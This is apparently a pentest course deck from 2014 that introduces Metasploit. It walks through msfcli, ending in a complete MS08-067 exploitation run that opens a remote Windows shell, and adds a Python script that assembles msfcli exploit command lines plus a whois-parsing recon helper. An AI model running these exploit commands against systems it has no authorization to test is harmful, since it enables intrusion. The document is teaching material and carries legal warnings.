PENTEST
Cerutti – IESGF - 2014
The pentester of old
• Things were easy because it was all new
• Departments were not prepared and...
• It happened easily:
Today...
Pentest phases
1. Pre-engagement interactions
2. Intelligence gathering
3. Threat modeling
4. Vulnerability analysis
5. Exploitation
6. Post exploitation
7. Reporting
Metasploit: exploiting vulnerabilities
• Don't be malicious.
• Don't be stupid.
• Don't attack targets without written permission.
• Consider the consequences of your actions.
• If you do things illegally, you can be caught and put in jail!
Metasploit
Starting MSFconsole
To launch msfconsole, enter msfconsole at the command line:
root@bt:/# cd /opt/framework3/msf3/
root@bt:/opt/framework3/msf3# msfconsole

 < metasploit >
 -------------
        \   ,__,
         \  (oo)____
            (__)    )\
               ||--|| *

msf >
To access msfconsole’s help files, enter help followed by the command
which you are interested in. In the next example, we are looking for help
for the command connect, which allows us to communicate with a host. The
resulting documentation lists usage, a description of the tool, and the various
option flags.
msf > help connect
msfcli
msfcli is a fantastic tool for one-off exploitation when you know exactly which exploit and options you need. It is less forgiving than msfconsole, but it offers some basic help (including usage and a list of modes) with the command msfcli -h, as shown here:
root@bt:/opt/framework3/msf3# msfcli -h
Usage: /opt/framework3/msf3/msfcli <exploit_name> <option=value> [mode]
===========================================================================

    Mode           Description
    ----           -----------
    (H)elp         You're looking at it, baby!
    (S)ummary      Show information about this module
    (O)ptions      Show available options for this module
    (A)dvanced     Show available advanced options for this module
    (I)DS Evasion  Show available ids evasion options for this module
    (P)ayloads     Show available payloads for this module
    (T)argets      Show available targets for this exploit module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module

root@bt:/opt/framework3/msf3#
Sample Usage
root@bt:/# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    0.0.0.0          yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

You can see that the module requires three options: RHOST, RPORT, and SMBPIPE. RPORT and SMBPIPE already carry usable defaults (445 and BROWSER), so in practice only RHOST has to be supplied. Now, by adding a P, we can check for available payloads:
root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                    Description
   ----                    -----------
   generic/debug_trap      Generate a debug trap in the target process
   generic/shell_bind_tcp  Listen for a connection and spawn a command shell

Having set all the required options for our exploit and selected a payload, we can run our exploit by passing the letter E at the end of the msfcli argument string, as shown here:
REMOTE WINDOWS PROMPT
root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
We’re successful,
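The O / P / E sequence above is exactly what gets scripted when msfcli is driven from a wrapper rather than typed by hand, and the failure mode is always the same: an E run with a required option still at its placeholder, or with a payload the module cannot stage. The following Python script is an added example (not code from the slides, nor part of Metasploit) that parses the module's own O and P listings and refuses to assemble the E command line until every required option is set and the payload appears in the compatible list. The two listings embedded in it are constructed samples shaped like the output shown above; the extra windows/shell/bind_tcp row (used by the E run but not visible in the truncated P listing) and the decision to treat 0.0.0.0 as "not yet set" are the example's own assumptions.

```python
"""Build a safe 'msfcli <module> ... E' command from the module's own O and P listings.

Added example: not code from the slides or from Metasploit.  The listings are
constructed samples in the layout msfcli prints for windows/smb/ms08_067_netapi.
"""
import shlex

# Constructed sample: output of  msfcli windows/smb/ms08_067_netapi O
OPTIONS_LISTING = """\
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    0.0.0.0          yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
"""

# Constructed sample: output of  msfcli windows/smb/ms08_067_netapi RHOST=... P
# (windows/shell/bind_tcp added so the E run from the slides validates)
PAYLOADS_LISTING = """\
[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                    Description
   ----                    -----------
   generic/debug_trap      Generate a debug trap in the target process
   generic/shell_bind_tcp  Listen for a connection and spawn a command shell
   windows/shell/bind_tcp  Listen for a connection, spawn a piped command shell (staged)
"""

# Values that mean "nobody set this yet".  0.0.0.0 is the placeholder the O
# listing shows for RHOST; treating it as unset is this example's assumption,
# not a rule msfcli itself enforces.
UNSET_VALUES = ("", "0.0.0.0")

COLUMNS = ("Name", "Current Setting", "Required", "Description")


def parse_options(listing):
    """Return {option: {"current": str, "required": bool, "description": str}}.

    Cells are sliced at the column offsets of the header line rather than split
    on whitespace, so an empty 'Current Setting' cell cannot shift the columns.
    """
    lines = listing.splitlines()
    header_idx = next(i for i, line in enumerate(lines)
                      if all(col in line for col in COLUMNS))
    starts = [lines[header_idx].index(col) for col in COLUMNS]
    options = {}
    for line in lines[header_idx + 2:]:            # skip the header and the ---- rule
        if not line.strip():
            continue
        cells = [line[starts[i]:starts[i + 1]].strip() for i in range(3)]
        cells.append(line[starts[3]:].strip())
        name, current, required, description = cells
        options[name] = {"current": current,
                         "required": required.lower() == "yes",
                         "description": description}
    return options


def parse_payloads(listing):
    """Return payload names from a P listing: first token of each row below the ---- rule."""
    names, in_table = [], False
    for line in listing.splitlines():
        cell = line.strip()
        if cell.startswith("----"):
            in_table = True
        elif in_table and cell:
            names.append(cell.split()[0])
    return names


def build_msfcli_command(module, options, payloads, user_args):
    """Return argv for 'msfcli <module> <option=value>... E', or raise ValueError.

    user_args maps option names (including PAYLOAD) to the operator's values;
    anything not given falls back to the 'Current Setting' from the O listing.
    """
    settings = {name: opt["current"] for name, opt in options.items()}
    settings.update(user_args)
    unset = [name for name, opt in options.items()
             if opt["required"] and settings.get(name, "") in UNSET_VALUES]
    if unset:
        raise ValueError("required options still unset: " + ", ".join(unset))
    payload = user_args.get("PAYLOAD")
    if payload not in payloads:
        raise ValueError(f"PAYLOAD {payload!r} is not compatible with {module}")
    return ["msfcli", module] + [f"{k}={v}" for k, v in user_args.items()] + ["E"]


if __name__ == "__main__":
    opts = parse_options(OPTIONS_LISTING)
    pays = parse_payloads(PAYLOADS_LISTING)
    argv = build_msfcli_command("windows/smb/ms08_067_netapi", opts, pays,
                                {"RHOST": "192.168.1.155",
                                 "PAYLOAD": "windows/shell/bind_tcp"})
    print(shlex.join(argv))
```

Run against a live msfcli you would capture the O and P output with subprocess instead of the embedded strings; the parsers stay the same because they key on the header line and the ---- rule, not on fixed widths.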
Running Armitage
To launch armitage, run the command armitage. During startup, select
Start MSF, which will allow armitage to connect to your Metasploit
instance.
root@bt:/opt/framework3/msf3# armitage
Gathering reconnaissance on the environment
Warning
If you follow the procedures described here you can damage your own system and the target system.
Make sure that the test environment, and only the test environment, is used.
Many of the examples are destructive and leave the target unusable.
The activities described here can be considered ILLEGAL when used ILLICITLY or with malicious intent.
Follow the rules; don't try to be smarter than the guy who will trace your steps after the event.
whois Lookups
msf > whois secmaniac.net
[*] exec: whois secmaniac.net
. . . time passes . . .
Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: SECMANIAC.NET
Created on: 03-Feb-10
Expires on: 03-Feb-12
Last Updated on: 03-Feb-10

Domain servers in listed order:
NS57.DOMAINCONTROL.COM
NS58.DOMAINCONTROL.COM
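What a pentester actually keeps from that whois answer is a handful of facts for the intelligence-gathering notes: who the registrar is, how old the registration is, when it lapses, and which provider runs the authoritative DNS (here the NS*.DOMAINCONTROL.COM servers, GoDaddy's DNS hosting). The script below is an added example, not code from the slides or from Metasploit, that parses the key/value lines and the name-server block of the output above into a dict and derives those facts relative to a reference date. The whois text embedded in it is a constructed sample with the same fields as the page's output, and the "registrable parent" of a name server is taken as its last two labels, which is an assumption that ignores ccTLD layouts.

```python
"""Reduce a raw whois answer to the facts recorded during intelligence gathering.

Added example, not code from the slides.  WHOIS_OUTPUT is a constructed sample
laid out like the 'msf > whois secmaniac.net' output on the page.
"""
from datetime import date, datetime

WHOIS_OUTPUT = """\
Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
   Domain Name: SECMANIAC.NET
      Created on: 03-Feb-10
      Expires on: 03-Feb-12
      Last Updated on: 03-Feb-10

   Domain servers in listed order:
      NS57.DOMAINCONTROL.COM
      NS58.DOMAINCONTROL.COM
"""


def parse_whois(text):
    """Return the 'Key: value' lines as a dict (keys in lower_snake_case) plus
    the name-server block as record['name_servers'] (lower-cased)."""
    record = {"name_servers": []}
    in_ns_block = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:                                   # blank line ends the NS block
            in_ns_block = False
        elif line.lower().startswith("domain servers in listed order"):
            in_ns_block = True
        elif in_ns_block:
            record["name_servers"].append(line.lower())
        else:
            key, sep, value = line.partition(":")      # split on the first ':' only,
            if sep:                                    # so URLs in values survive
                record[key.strip().lower().replace(" ", "_")] = value.strip()
    return record


def parse_registrar_date(text):
    """Parse the DD-Mon-YY form this registrar prints (03-Feb-10 -> 2010-02-03)."""
    return datetime.strptime(text, "%d-%b-%y").date()


def dns_providers(name_servers):
    """Distinct parent domains of the name servers, e.g. ns57.domaincontrol.com ->
    domaincontrol.com.  Assumes the provider is the last two labels (no ccTLD logic)."""
    return sorted({".".join(ns.split(".")[-2:]) for ns in name_servers})


def summarize(text, today):
    """The facts worth carrying into the threat model, computed relative to 'today'."""
    rec = parse_whois(text)
    created = parse_registrar_date(rec["created_on"])
    expires = parse_registrar_date(rec["expires_on"])
    return {
        "domain": rec["domain_name"].lower(),
        "registrar": rec["registered_through"],
        "age_days": (today - created).days,
        "days_to_expiry": (expires - today).days,
        "expired": expires < today,
        "dns_providers": dns_providers(rec["name_servers"]),
    }


if __name__ == "__main__":
    for key, value in summarize(WHOIS_OUTPUT, date.today()).items():
        print(f"{key:15} {value}")
```

Real whois servers differ in field names and date formats, so in practice parse_whois is the part that stays stable (generic key/value plus the NS block) while parse_registrar_date has to be adapted per registrar.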